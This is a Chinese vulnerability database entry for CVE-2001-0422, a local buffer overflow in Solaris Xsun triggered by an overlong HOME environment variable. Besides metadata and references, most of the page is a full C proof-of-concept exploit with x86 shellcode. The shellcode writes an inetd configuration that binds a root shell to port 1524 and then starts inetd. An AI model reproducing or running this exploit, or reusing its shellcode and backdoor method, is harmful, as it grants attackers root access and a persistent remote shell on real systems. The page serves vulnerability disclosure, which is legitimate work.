Solaris Xsun缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106288 漏洞类型 缓冲区溢出
发布时间 2001-04-10 更新时间 2005-05-02
CVE编号 CVE-2001-0422 CNNVD-ID CNNVD-200107-007
漏洞平台 Solaris CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/20743
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-007
|漏洞详情
Solaris8及其早期版本的Xsun存在缓冲区溢出漏洞。本地用户借助超长HOME环境变量执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/2561/info

The X11 server that ships with Sun Microsystems' Solaris, Xsun, contains a locally exploitable buffer overflow vulnerability.

The condition is present when the value of the HOME environment variable is of excessive length (more than 1050 bytes long).

An attacker may exploit this vulnerability to execute arbitrary code with effective group 'root' privileges. 

/***********************************/
Solaris 7 (x86) /usr/openwin/bin/Xsun
HOME environment overflow

Proof of Concept Exploitation
riley@eeye.com

Puts a Root shell on local port 1524
/***********************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFLEN  1041

/* seteuid/setuid/inetd shell */
char eyecode[] =
"\xeb\x51\x9a\x65\x65\x79\x65\x07\x90\xc3\x5e"
"\x29\xc0\x89\x46\xab\x88\x46\xb0\x89\x46\x0c"
"\x50\xb0\x8d\xe8\xe4\xff\xff\xff\x29\xc0\x50"
"\xb0\x17\xe8\xda\xff\xff\xff\x29\xc0\x88\x46"
"\x17\x88\x46\x1a\x88\x46\x78\x29\xc0\x50\x56"
"\x8d\x5e\x10\x89\x1e\x53\x8d\x5e\x18\x89\x5e"
"\x04\x8d\x5e\x1b\x89\x5e\x08\xb0\x3b\xe8\xb2"
"\xff\xff\xff\x90\x90\xc3\xe8\xb2\xff\xff\xff"
"\x90\x6b\x61\x6d\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x2f\x62\x69\x6e\x2f\x73"
"\x68\x20\x2d\x63\x20"
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\">/tmp/eeye;"
"/usr/sbin/inetd -s /tmp/eeye2001";

char buf[BUFLEN];
unsigned long int nop, esp;
long int offset = 0;

unsigned long int get_esp()
{__asm__("movl %esp,%eax");}

int main (int argc, char *argv[])
{
	int i;
	if (argc > 1)
		offset = strtol(argv[1], NULL, 0);
	else
		offset = -200;
	esp = get_esp();
	memset(buf, 0x90, BUFLEN);
	memcpy(buf+800, eyecode, strlen(eyecode));
	*((int *) &buf[1037]) = esp+offset;
	strncpy(&buf[0],"HOME=",5);
	putenv(buf);
	execl("/usr/openwin/bin/Xsun", "eEye", ":1",NULL);
	return;
}
|参考资料

来源:BID
名称:2561
链接:http://www.securityfocus.com/bid/2561
来源:BUGTRAQ
名称:20010410SolarisXsunbufferoverflowvulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2001-04/0158.html
来源:XF
名称:solaris-xsun-home-bo(6343)
链接:http://xforce.iss.net/static/6343.php
来源:USGovernmentResource:oval:org.mitre.oval:def:555
名称:oval:org.mitre.oval:def:555
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:555